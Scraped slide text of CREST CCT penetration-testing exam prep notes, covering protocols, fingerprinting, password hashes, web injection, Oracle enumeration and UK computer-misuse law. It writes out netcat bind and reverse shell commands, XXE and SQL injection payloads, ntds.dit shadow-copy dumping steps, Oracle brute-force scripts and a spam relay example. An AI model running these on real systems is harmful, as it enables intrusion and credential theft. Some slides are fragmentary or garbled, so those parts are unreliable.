![OSPF
Open Shortest Path First (OSPF) uses a link state routing (LSR) algorithm and falls into the group of interior gateway
protocols (IGPs), operating within a single autonomous system (AS). OSPF supports the Classless Inter-Domain
Routing (CIDR) addressing model.
OSPF is a widely used IGP in large enterprise networks.
IGRP
Interior Gateway Routing Protocol (IGRP) is a distance vector interior gateway protocol (IGP) developed by Cisco. It is
used by routers to exchange routing data within an autonomous system.
IGRP is a proprietary protocol. IGRP was created in part to overcome the limitations of RIP (maximum hop count of
only 15, and a single routing metric) when used within large networks. IGRP supports multiple metrics for each
route, including bandwidth, delay, load, and reliability; to compare two routes these metrics are combined together
into a single metric, using a formula which can be adjusted through the use of pre-set constants. The maximum
configurable hop count of IGRP-routed packets is 255 (default 100), and routing updates are broadcast every 90
seconds (by default). IGRP uses protocol number 9 for communication.
IGRP is considered a classful routing protocol. Because the protocol has no field for a subnet mask, the router
assumes that all subnetwork addresses within the same Class A, Class B, or Class C network have the same subnet
mask as the subnet mask configured for the interfaces in question. This contrasts with classless routing protocols
that can use variable length subnet masks. Classful protocols have become less popular as they are wasteful of IP
address space.
EIGRP
Enhanced Interior Gateway Routing Protocol (EIGRP) is an advanced distance-vector routing protocol that is used on
a computer network for automating routing decisions and configuration. The protocol was designed by Cisco
Systems as a proprietary protocol, available only on Cisco routers. Partial functionality of EIGRP was converted to an
open standard in 2013[1] and was published with informational status as RFC 7868 in 2016.
EIGRP is used on a router to share routes with other routers within the same autonomous system. Unlike other well
known routing protocols, such as RIP, EIGRP only sends incremental updates, reducing the workload on the router
and the amount of data that needs to be transmitted.
EIGRP replaced the Interior Gateway Routing Protocol (IGRP) in 1993. One of the major reasons for this was the
change to classless IPv4 addresses in the Internet Protocol, which IGRP could not support.
B4 - Network Mapping & Target Identification
Analysis of output from tools used to map the route between the engagement point and a number of targets.
Traceroute to port
traceroute -T -p 80 x.x.x.x where -p 80 is port, sometimes get different route to 443.
nping --tr, --traceroute Traceroute mode (can only be used with TCP/UDP/ICMP modes).
Nmap -sn (-sP) – No port scans after host discovery; -Pn – No ping after host discovery
Windows tracert - The TRACERT diagnostic utility determines the route to a destination by sending Internet Control
Message Protocol (ICMP) echo packets to the destination.
In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. Because each router along the path is required
to decrement the packet's TTL by at least 1 before forwarding the packet, the TTL is effectively a hop counter. When
the TTL on a packet reaches zero (0), the router sends an ICMP "Time Exceeded" message back to the source
computer. (contrast ICMP message with Traceroute – same?)
Linux traceroute – see above](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-7-320.jpg)
![Generating ICMP packets
Ping generates ICMP. Nmap does is it with more options:
nmap -sP -PE scanme.nmap.org
PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
Ping Broadcast
The last octet is reserved as broadcast address which is used to send traffic to all hosts within a subnet.
ping -b 10.10.5.255
You can also send a broadcast to other subnets:
ping -b 255.255.255.255
B8 - OS Fingerprinting
Remote operating system fingerprinting; active and passive techniques.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
Active fingerprinting works by sending packets to a target and analysing the packets that are sent back.
Passive fingerprinting sniffs TCP/IP ports, rather than generating network traffic by sending packets to them.
Hence, it’s a more effective way of avoiding detection or being stopped by a firewall. While sniffing traffic,
passive fingerprinting does its best to determine a target machine’s OS by analysing the initial Time to Live
(TTL) in packet IP headers, and the TCP window size in the first packet of a TCP session, which is usually
either a SYN (synchronize) or SYN/ACK (synchronize and acknowledge) packet.
Understanding TTL to map OS: 123 is near 128 which is default Windows, so likely a Windows host which is 5
hops away as each hop reduces the TTL (https://subinsb.com/default-device-ttl-values)
When used in Ping, the TTL of the remote host is returned. In below example for theguardian.co.uk ping
returns TTL of 60. (Linux default: 64/255)
Pinging theguardian.co.uk [151.101.0.233] with 32 bytes of data:
Reply from 151.101.0.233: bytes=32 time=15ms TTL=60
…when we trace to same host we see it is 5 hops, but first hop does not count as its from localhost to router
and TTL only decrements from router. Hence 4 hops are added to the 60 we have, hence TTL is 64 meaning a
Unix host.
ping -4 localhost # -4 forces IP4 usage
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
B9 - Application Fingerprinting and Evaluating Unknown Services
Determining server types and network application versions from application banners.
WTF…
Evaluation of responsive but unknown network applications.
More WTF…
B10 - Network Access Control Analysis
Reviewing firewall rule bases and network access control lists.
OK, whatever…final has to be drop all ANY ANY DENY/DROP](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-9-320.jpg)
![TFTP
TFTP is a minimal file transfer protocol that does not provide subcommands to list remote files, and does not require
authentication. Basic commands are [-i] host [GET | PUT] source [destination] where -i is for binary
transfer. UDP port 69.
It (server) is not installed by default on any Windows platform.
Cisco Reverse Telnet
Reverse telnet is used mostly for connecting to the console port of a router, a switch or other device.
NTP
Implementations send and receive timestamps using the UDP port 123. They can also use broadcasting or
multicasting, where clients passively listen to time updates after an initial round-trip calibrating exchange. NTP is
intended to synchronize all participating computers to within a few milliseconds of Coordinated Universal Time
(UTC).
NTP uses a hierarchical system of time sources. Each level of this hierarchy is termed a stratum and is assigned a
number starting with zero for the reference clock at the top. Stratum 0 are high-precision timekeeping devices and
are also known as reference clocks. Stratum 3 are computers that are synchronized to stratum 2 servers and can act
as servers for stratum 4 computers, and so on. The upper limit for stratum is 15; stratum 16 is used to indicate that a
device is unsynchronized.
The 64-bit timestamps consist of a 32-bit part for seconds and a 32-bit part for fractional second. NTP uses an epoch
of January 1, 1900. NTPv4 introduces a 128-bit date format: 64 bits for the second and 64 bits for the fractional-
second.
NTP is not human understandable time, as not one time is received.
Synchronizing a client to a network server consists of several packet exchanges where each exchange is a pair of
request and reply. When sending out a request, the client stores its own time (originate timestamp) into the packet
being sent. When a server receives such a packet, it will in turn store its own time (receive timestamp) into the
packet, and the packet will be returned after putting a transmit timestamp into the packet. When receiving the
reply, the receiver will once more log its own receipt time to estimate the travelling time of the packet. The
travelling time (delay) is estimated to be half of "the total delay minus remote processing time", assuming
symmetrical delays.
Only if the replies from a server satisfy the conditions defined in the protocol specification, the server is considered
valid.](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-19-320.jpg)
![2. Password characters are also limited to a subset of 95 characters in the 256-byte ASCII character set.
3. Password length is limited to maximum of 14 characters
4. A 14-character password is broken into 7+7 characters and the hash is calculated for the two halves
separately.
5. If the password is 7 characters or less, then the second half of hash will always produce same
constant value (0xAAD3B435B51404EE). Therefore, if the length of password is less than or equal to
7 characters, then a password length of 7 characters or less can be identified visibly without using
tools.
6. The hash value is sent to network servers without salting, making it susceptible to man-in-the-
middle attacks such as replay the hash, and also allowing rainbow tables to be constructed.
NTLM (v1) (NT Hash) is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN).
The algorithm: MD4(UTF-16-LE(password))
NTLM version 2 (NTLMv2), which was introduced in Windows NT 4.0 SP4 (and natively supported in
Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks, and
adding the ability for a server to authenticate to the client.
NTLMv2 is the challenge-response protocol for performing MS Windows password authentication over the
networks. It's used any time a password needs to be provided to a Windows or Samba server and the client
is not part of the Windows Active Directory domain.
The deeper problem is that NTLMv1-2 provide absolutely no protection against credentials forwarding/relay
or reflection attacks. This means that an active attacker (such as a man-the-middle) is sometimes able to
redirect the login of the legitimate user to authenticate his own session.
NTLM remains vulnerable to the pass the hash attack, which is a variant on the reflection attack which was
addressed by Microsoft security update MS08-068. For example, Metasploit can be used in many cases to
obtain credentials from one machine which can be used to gain control of another machine.
NTLM Hash: Generating the NTLM hash is far easier than a LANMAN hash. It is simply an MD4() of the
password (in Unicode).
Challenge/response - Once the LANMAN and NTLM hashes have been calculated, they can't just be put on
the wire. That would be vulnerable to any number of attacks, the most obvious being replay.
Offline Password Analysis (rainbow tables / hash brute forcing)
Distinction between SAM database on a Windows system, or the NTDS database on the Domain Controller.
To further protect the password hashes these are encrypted using a key stored in the SYSTEM
(C:WindowsSystem32configSYSTEM) registry hive. This second encryption step is why in order to
perform a password dump for auditing, a copy of both files is needed. Hashes (for AD) are stored at
c:windowsNTDSntds.dit, but is locked due to it being accessed all the time.
%systemRoot%system32Config
%systemRoot%repair(pre Windows XP)
%systemRoot%NTDSntds.dit (Active Directory)
From registry (requires System Privileges)
Windows Server 2008-2016 – Use ntdsutil
Windows Server 2003 - vssadmin create shadow /for=C:
vssadmin list shadows - check whether any shadow copies already exist
vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM
vssadmin delete shadows /shadow=[GUID] - delete the shadow copy
Cracking the Hashes – Tools: John the Ripper, Cain & Abel is a Windows-based tool with a host of useful
features, including a password cracker. It's normally a good idea to break very weak passwords with a simple](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-33-320.jpg)
![Both files are hidden therefore from the NFS folder issue a ls -la.
The .rhosts clarifies which remotes hosts or users can access a local account on the system. If the contents of the
.rhosts file are the ++ sign this means that it allows connections from any host on the network and from any
username.
The following commands will allow the root user of the system to connect on the target directly as the system will
not prompt for a password since all the users are trusted from all systems.
rsh -l root IP
rlogin -l root IP
F7 - X11
X Windows security and configuration; host-based vs. user-based access control.
X servers listen on TCP ports 6000+ (depending number of concurrent displays).
DISPLAY variable is basically 3 components:
<host>:<display>[.<screen>]
When DISPLAY is set to host:4, short for tcp/host:4, clients use TCP to connect to the server. The TCP port is
then 6000 plus the display number (in that case 6004).
When I request X forwarding from SSH server, then SSH server sets a $DISPLAY variable with value
localhost:10.0. In addition, it starts to listen on 127.0.0.1 port 6010
Xorg listens on port 6000+n, where n is the display number.
Xwd allows you to take screenshots of the display.
Xhost Authentication
Access based on host - The host-based access method consists in specifying a set of hosts that are authorized to
connect to the X display server. Xhost command is used with + - to allow and deny X access from individual hosts.
The xhost command uses the "/etc/XD.hosts" files that contain the X server authentication information
Xauth Authentication
The Xauth command is in charge of managing the $HOME/.Xauthority file that keeps the authentication
information. This file contains one cookie for each X display the user can use.
F8 - RPC services
RPC service enumeration
The RPC portmapper is a server that converts RPC program numbers into TCP/IP (or UDP/IP) protocol port numbers.
Several interesting Unix daemons, such as Network Information Service+, Network File System, and Common
Desktop Environment, run as RPC services on dynamically assigned high ports. The portmapper service (aka rpcbind)
runs on port TCP/UDP 111 or 32771 and can be queried using rpcinfo to discover the available services and their port
number.
The Nmap documentation states that if portmapper is filtered, services can be identified directly using a Nmap scan
of high port ranges (TCP/UDP 32771-34000). RPC Grinding scan is done as part of an aggressive scan (-A) or can be
called explicitly with -sR.
# rpcinfo -p 192.168.0.50 (not -l)
In networks protected by firewalls and other mechanisms, access to the RPC portmapper service running on port 111](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-42-320.jpg)
![G4 - Web Protocols
HTTP, HTTPS
HTTP Connect
telnet www.example.org 80
Trying 192.168.0.14…
Connected to 192.168.0.14.
Escape Character is ‘^]’,
CONNECT maila.microsoft.com:25 HTTP/1.0
HTTP/1.0 200 Connection established
220 inet-imc-02.redmond.corp.microsoft.com Microsoft.com ESTMP Server
Note the two carriage returns above. Status 200 shows OK to connection. A failed connection will display 405 Method
Not Allowed, or diversion to a generic web page.
Can also use HTTP POST, in which case you specify http in connection attempt:
POST http://mail.microsoft.com:25 /HTTP/1.0
HTTP GET can be used along with HOST header:
telnet www.example.org 80
Trying 192.168.0.14…
Connected to 192.168.0.14.
Escape Character is ‘^]’,
GET / HTTP/1.1
HOST: mx4.sun.com:25
HELO .
MAIL FROM: spammer@alter.net
RCPT TO: targtet@unsuspecting.com
DATA
Subject: Look Ma!
.
HTTP Methods
HTTP 1.0
GET
POST - Although the URL can still be bookmarked, any parameters sent in the message body will be excluded
from the bookmark. These parameters will also be excluded from the various locations in which logs of URLs are
maintained and from the Referer header.
HEAD - Functions in the same way as a GET request, except that the server should not return a message body in
its response. The server should return the same headers that it would have returned to the corresponding GET
request.
HTTP 1.1
OPTIONS - asks the server to report the HTTP methods that are available for a particular resource.
PUT
DELETE
CONNECT - used by proxy servers. Can be abused to establish connections with arbitrary hosts.
TRACE - designed for diagnostic purposes. The server should return in the response body the exact contents of
the request message it received. This can be used to detect the effect of any proxy servers between the client
and server that may manipulate the request.](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-46-320.jpg)
![XML, XML schema and DTD
An XML schema is a description of a type of XML document. It tells users to develop their XML in such a schema.
Whereas an XML document is a form to communicate with another application or system (often disparate systems)
To ensure data is in right structure a DTD (Document Type Definition) can be used. This defines the elements that
may be included in your document, what attributes these elements have, and the ordering and nesting of the
elements.
The critical difference between DTDs and XML Schema is that XML Schema utilize an XML-based syntax, whereas
DTDs have a unique syntax held over from SGML DTDs. Although DTDs are often criticized because of this need to
learn a new syntax, the syntax itself is quite terse. The opposite is true for XML Schema, which are verbose, but also
make use of tags and XML so that authors of XML should find the syntax of XML Schema less intimidating.
The DTD is declared in a DOCTYPE declaration beneath the XML declaration contained within an XML document:
Inline Definition – where DTD is contained within the XML:
<?xml version="1.0"?>
<!DOCTYPE documentelement [definition]>
External Definition – Inline is handy for a few docs, but external definition reduces overhead by placing DTD on web
server:
<?xml version="1.0"?>
<!DOCTYPE documentelement SYSTEM "documentelement.dtd">](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-53-320.jpg)
![Browser Security
SOP - Same-origin policy is a security enforcement found in most common browsers that restricts the way a document or
script (or other data) that gets loaded from one origin can communicate and associate with properties of another origin.
It's a crucial concept of security which runs web applications of various kinds.
Origin is considered the same based on the protocol, hostname port number, of the webpage being the same.
Keep in mind that the same-origin policy is not only for JS but for cookies, AJAX, Flash (but not images?), and so on. Data
stored inside localStorage is also governed by this policy, that is, origin-separated.
G5 - Web Mark-up Languages
Web mark-up languages: HTML
XML
An XML DTD is document which is used to validate an XML document for certain criteria, remember that an XML
document may be syntactically correct but may not follow the DTD. It acts as a validating template containing a defining
and valid structure, attributes, and elements for a certain XML document.
An XXE attack is based on the concept of external entities in XML. We can utilize the URI portion of external entities to do
nasty things such as reading files, exfiltration of data, server-side request forgery, or even executing arbitrary code.
<!DOCTYPE student [
<!ENTITY oops SYSTEM "file:///etc/passwd">
]>
SSRF
<!DOCTYPE student [
<!ENTITY oops SYSTEM "http://scanme.nmap.org:20/">
]>
G6 - Web Programming Languages
Common web programming languages: JSP, ASP, PHP, CGI based Perl and JavaScript
JSP (Java Server Pages) and ASP (Active Server Pages) are two of the commonly used server-side scripting languages
that are used today in web development. ... ASP code are interpreted on the fly each time it is accessed while JSP
pages can either be interpreted or compiled into a servlet.
PHP
A common practice in PHP is to escape parameters using the function called mysql_real_escape_string()
before sending the SQL query.
Eval() – Evaluate a string as PHP code. This is often used by an attacker to hide their code and tools on the
server itself. You can configure php to disable eval(). The eval() language construct is very dangerous
because it allows execution of arbitrary PHP code. Its use thus is discouraged.
To restrict PHP information leakage, disable expose_php - expose_php = On
File uploads - You can disable file uploads using php - file_uploads=Off
Turn Off Remote Code Execution - If enabled, allow_url_fopen allows PHP’s file functions — such as
file_get_contents() and the include and require statements — can retrieve data from remote
locations, like an FTP or web site - allow_url_fopen=Off
Enable SQL Safe Mode - sql.safe_mode=On
Disable Dangerous PHP Functions - disable_functions
=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,
show_source (but not call())](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-56-320.jpg)
![‘ OR 1=1--
“ OR 1=1--
OR 1=1--
‘ OR ‘a’=’a
“ OR “a”=”a
‘) OR (‘a’=’a
BLIND Based SQL Injection
Microsoft SQL: ?id=1' waitfor delay '00:00:10'— can also use WAITFOR TIME 'hh:mm:ss' (WAIT FOR TIME is
rarely used, but it could help bypassing weak blacklist filters only checking for the popular WAIT FOR DELAY
instruction.)
MySQL: BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')) – can also use sleep(10)
Using some time-taking operation e.g. BENCHMARK(), will delay server responses if the expression is True. Above
will execute the ENCODE function 5000000 times.
PostgreSQL: pg_sleep() - pg_sleep(10)
Oracle: The SLEEP() function can be used, however it needs to be integrated in a PL/SQL block:
BEGIN DBMS_LOCK.SLEEP(15); END;
LDAP injection
Query Types - Simple match conditions, Disjunctive (several search queries from several sources, like multiple ORs),
Conjunctive (like username and password)
The main way LDAP stores names is based on DN (distinguished name).
A DN might look like this: cn=Richard Feynman, ou=Physics Department, dc=Caltech, dc=edu
There are certain characters that are considered special characters (Boolean conditions and group aggregations) in a
DN. The exhaustive list is the following: ',','','#','+','<','>',';','"','=', and leading or trailing spaces (but no ? – remember
you cannot escape ? in Perl either…)
Active Directory requires that the following ten characters be escaped with the backslash "" escape character if
they appear in any of the individual components of a distinguished name:
Some characters that are allowed in distinguished names and do not need to be escaped include:
* ( ) . & - _ [ ] ` ~ | @ $ % ^ ? : { } ! ' # Hence anything but Boolean, except for or |
LDAP injection is a server-side attack, which could allow sensitive information about users and hosts represented in
an LDAP structure to be disclosed, modified, or inserted. This is done by manipulating input parameters afterwards](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-63-320.jpg)
![H11 - Session Handling
Common pitfalls associated with the design and implementation of session handling mechanisms.
Cookies – XSS, Transport: Session Cookie restricted to Secure Channel
HTTP itself is a stateless protocol, and session management enables the application to uniquely identify a
given user across a number of different requests and to handle the data that it accumulates about the state
of that user's interaction with the application.
Session tokens should only be stored in non-persistent cookies.
Generation of Cookie values for session – predictable?
H12 - Encryption
Common techniques used for encrypting data in transit and data at rest, either on the client or server side.
PGP: To encrypt data, PGP generates a symmetric key to encrypt data which is protected by the asymmetric key.
PGP can be used to send messages confidentially. For this, PGP combines symmetric-key encryption and public-key
encryption. The message is encrypted using a symmetric encryption algorithm, which requires a symmetric key. Each
symmetric key is used only once and is also called a session key. The message and its session key are sent to the
receiver. The session key must be sent to the receiver so they know how to decrypt the message, but to protect it
during transmission it is encrypted with the receiver's public key. Only the private key belonging to the receiver can
decrypt the session key.
RC algorithm: The RC algorithms are a set of symmetric-key encryption algorithms invented by Ron Rivest. Despite
the similarity in their names, the algorithms are for the most part unrelated. There have been six RC algorithms so
far.
Common Symmetric Encryption Algorithms: AES (Advanced Encryption Standard), Blowfish, DES (Data Encryption
Standard), Triple DES, Serpent, Twofish, RC.
Common Asymmetric Encryption Algorithms: RSA, EEC, DSA.
MD5 – Salted: hash(pass+salt) - When a user picks or is assigned a password, it is encoded with a randomly
generated value called the salt. This means that any particular password could be stored in 4096 different ways. The
salt value is then stored with the encoded password.
When a user logs in and supplies a password, the salt is first retrieved from the stored encoded password. Salting
protects against:
rainbow tables (pre-calculated hashes)
dictionary attacks (often included in the above)
finding identical passwords if you crack one (without salt everybody that has password as their password will
have same hash)
Contents of /etc/shadow:
[root@slashroot1 ~]# cat /etc/shadow
root:$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1:15651:0:99999:7:::
The first field is a numerical number that tell's you the hashing algorithm that's being used.
$1 = MD5
$2 =Blowfish
$2a=eksblowfish
$5 =SHA-256
$6 =SHA-512 Algorithm
The second field is the salt value, the last field is the hash value of salt+user password.](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-66-320.jpg)
![Salt value is Etg2ExUZ. You can reproduce the same output by providing the salt value of Etg2ExUZ and the original
password.
[root@slashroot1 ~]# openssl passwd -1 -salt Etg2ExUZ redhat
$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1
[root@slashroot1 ~]#
You can see that the encoded entry can only be reproduced with the exact same salt value (which is always
randomly selected by the password program).
Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic
values (e.g. MD5 hashes)
Base64
Base64 is a group of similar binary-to-text encoding schemes that represent binary data in an ASCII string
format by translating it into a radix-64 representation. The term Base64 originates from a specific MIME
content transfer encoding.
Each base64 digit represents exactly 6 bits of data. Three 8-bit bytes (i.e., a total of 24 bits) can therefore be
represented by four 6-bit base64 digits.
Base64 is not encryption -- it's an encoding. It's a way of representing binary data using only printable (text)
characters.
While encoding the user name and password with the Base64 algorithm typically makes them unreadable by
the naked eye, they are as easily decoded as they are encoded. Security is not the intent of the encoding
step. Rather, the intent of the encoding is to encode non-HTTP-compatible characters that may be in the
user name or password into those that are HTTP-compatible.
Example of Base64:
TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz
IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg
dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu
dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLCBleGNlZWRzIHRo
ZSBzaG9ydCB2ZWhlbWVuY2Ugb2YgYW55IGNhcm5hbCBwbGVhc3VyZS4=
The MD5 algorithm is a widely used hash function producing a 128-bit hash value. Although MD5 was
initially designed to be used as a cryptographic hash function, it has been found to suffer from extensive
vulnerabilities. It can still be used as a checksum to verify data integrity, but only against unintentional
corruption.
Like most hash functions, MD5 is neither encryption nor encoding. It can be cracked by brute-force attack
and suffers from extensive vulnerabilities.
The 128-bit (16-byte) MD5 hashes (also termed message digests) are typically represented as a sequence of
32 hexadecimal digits. The following demonstrates a 43-byte ASCII input and the corresponding MD5 hash:
MD5("The quick brown fox jumps over the lazy dog") =
9e107d9d372bb6826bd81d3542a419d6
Percent Encoding
Used in URL encoding. Reserved characters have special meanings in the context of URLs and must be encoded into
another form, which is the percent-encoded form to avoid any sort of ambiguity.
Reserved characters have special meanings in the context of URLs and must be encoded into another form, which is the
percent-encoded form to avoid any sort of ambiguity.
A classic example of such ambiguity can be /, which is used to separate paths in a URL, so if the necessity arises to
transmit the / character in a URL then we must encode it accordingly, so that the receiver or parser of the URL does
not get confused and parse the URL incorrectly. Therefore, in that case / is encoded into %2F, this will be decoded
into / by the URL parser.](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-67-320.jpg)
![When enumerating Oracle, the first step is to talk to the TNS-Listener that usually resides on the default port
(1521/TCP).
$ ./tnscmd.pl status -h 192.168.0.2
sending (CONNECT_DATA=(COMMAND=status)) to 192.168.0.2:1521
writing 89 bytes
reading
. .......6.........E.
...........O........(DESCRIPTION=(TMP=)(VSNNUM=153093376)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)
(VERSION=TNSLSNR for 32-bit Windows: Version 10.2.0.5.0 - Production)(START_DATE=30-MAY-2007
02:00:25)
In the above example we have discovered an Oracle 10g database. Once we have access to the listener the next step
is to enumerate the SID.
There are a number of tools (Kali, Nmap Scripts) to brute force the SID which once you have, the next step is account
enumeration. Review the default username and passwords.
Derivation of version and patch information from hosts running Oracle software.
nmap x.x.x.x -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-
args oracle-enum-users.sid=ORCL,userdb=orausers.txt
TNS listener on TCP 1521 (sometimes 1526,1541).
msf > use auxiliary/admin/oracle/tnscmd
Or use tnscmd.pl (stored under /Files and Software - remember to take for CREST lab)
perl tnscmd.pl -h 192.168.0.13 (default command = ping)
perl tnscmd.pl version -h 192.168.0.13 -- VSNNUM=186647040
VSNNUM=135294976 – Conduct Decimal to HEX conversion (Windows Calc Programmer setting) - 810 7000 hence
version 8.1.7 (seem to ignore the 0's.. as it is 8107000 and is book is written as 08107000)
[oracle@DCG023 8828328]$ opatch lsinventory
perl tnscmd.pl status -h 192.168.0.13
Better approach is NSE script: nmap --script=oracle-sid-brute -p 1521 x.x.x.x - which returns correctly version is
Oracle XE (Express Edition)
| oracle-sid-brute:
|_ XE
...then having got the SID:
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=XE 192.168.0.13 - this will check common
account, specify your own list as below.
nmap --script oracle-brute -p 1521 --script-args oracle-
brute.sid=XE,userdb=/root/user.txt,passdb=/root/pass.txt 192.168.0.13
Default Oracle accounts.
perfstat:perfstat => Valid credentials
| scott:tiger => Valid credentials (Source)
Oracle Database installs with several default database user accounts.
Upon successful installation of the database, the Database Configuration Assistant automatically locks and expires
most default database user accounts. However, if you performed a manual installation, then no default database
users are locked upon successful installation of the database server. Or, if you have upgraded from a previous
release of Oracle Database, you may have default accounts from earlier releases.](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-71-320.jpg)
![nc -l -p 1234 > out.file # Receiving End
nc -w 3 [destination] 1234 < out.file # Sending End
Set up a Netcat Bind Shell (Windows)
nc -l -p 4444 -e cmd.exe
nc <IP Address> 4444 # Connect to the shell
Set up a Netcat Bind Shell (Linux)
nc -l -p 4444 -e /bin/sh
nc <IP Address> 4444 # Connect to the shell
Set up a Netcat Reverse Shell (Windows)
The (compromised host) connects to me, where I have my -l ready. The-e runs on compromised host, not my local, hence
reverse shell.
nc -l -p 443 # Attacker listening for connection
nc <IP Address> 443 -e cmd.exe
-v verbose
-l listen
-p port
-n supress name/port resolutions
-e execute
-w timeout - has no effect on the -l option. The default is no timeout.
nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx
The -s binds ``in front of'' some services that may already be listening on those ports (but will shut that port
down).
Use of | - Pipe takes the output of one command and makes it usable for a following command. Output from
the left-hand command is passed directly to the input for the command on the right-hand side of the pipe.
Example: cat ./somefile | grep cool - Takes the output of somefile and make it available for grep, and
then grep will print all lines with the word cool in it.
Hence in netcat case on receiving side it’ll be on left hand side after which pipe right hand side can process
it, such as: nc -l -p 1234 | uncompress -c | tar xvfp -
On sending side it’ll have to be on right hand side with left hand side being the element which manipulates
the file, such as: tar cfp - /some/dir | compress -c | nc -w 3 [destination] 1234
The type command will display the command name's path, or other information (such as alias):
$ type cp
cp is /bin/cp
$ type unknown
unknown not found
$ type type
type is a shell builtin
Password Combinations
8-character password consisting of 26 lower case alphabet and 10 numerical = 368
= 2821109907456 (verified on
calculator)
Web Testing App Proxy Configurations
Client Side Certificates: When testing with a client side certificate (often used for authentication purposes),
it needs to be installed on the testing proxy server (Client Certificate in Burp's User Options/SSL, Options/SSL
menu fails to load upon restore if client certificate, Options / SSL / Client SSL Certificates, Usage of
Certificates)](https://image.slidesharecdn.com/crestcctexamprep-190815170707/85/CREST-CCT-Exam-Prep-Notes-75-320.jpg)
CREST CCT Exam Prep Notes
- 1. Appendix A: Soft Skills and Assessment Management A1 - Engagement Lifecycle Benefits and utility of penetration testing to the client. Structure of penetration testing, including the relevant processes and procedures. Concepts of infrastructure testing and application testing, including black box and white box formats. Project closure and debrief A2 - Law & Compliance Knowledge of pertinent UK legal issues: Computer Misuse Act 1990 Unauthorised access is key term. It means you need permission. Under the Computer Misuse Act 1990, the following are offences: Unauthorised access to computer material (section 1); Unauthorised access with intent to commit or facilitate commission of further offences (section 2); and Unauthorised modification of computer material (section 3). These offences are potentially wide in scope: even guessing the password to access someone else's webmail account could be prosecuted as an offence of unauthorised access to computer material. When companies commission penetration testing, a contract should be signed before testing begins, to ensure that the testing company's actions are authorised. It should also deal with liability issues: what happens if the tester takes down a critical part of the organisation's website and the organisation suffers loss? Ensure you do not go out of scope (follow redirects?). The Act was amended by The Police and Justice Act 2006, which increased the penalties. Human Rights Act 1998 Everyone has the right to respect for his private and family life, his home and his correspondence. There shall be no interference by a public authority with the exercise of this right except such as is in accordance with the law and is necessary in a democratic society in the interests of national security, public safety or the economic well-being of the country, for the prevention of disorder or crime, for the protection of health or morals, or for the protection of the rights and freedoms of others. Data Protection Act 1998 Section 55 – Unlawful obtaining of personal data. This section makes it an offence for people (Other Parties), such as hackers and impersonators, outside the organisation to obtain unauthorised access to the personal data. Ensure you do not keep any records that would fall under the act for longer than is necessary - i.e. prove it is accessible and do not back up those records. Data controllers may want to employ you to test they have appropriate measures in place to secure the data.
- 2. Police and Justice Act 2006 Makes amendments to the Computer Misuse Act 1990 Increased penalties of Computer Misuse Act. (Makes unauthorized computer access serious enough to fall under extradition) Made it illegal to perform DOS attacks. Denial of Service attacks - Such attacks are illegal. They were banned in Scotland in 2007 and in England and Wales in 2008 when section 3 of the Computer Misuse Act was amended (by the Police and Justice Act 2006). Made it illegal to supply and own hacking tools. Impact of this legislation on penetration testing activities. Awareness of sector-specific regulatory issues.
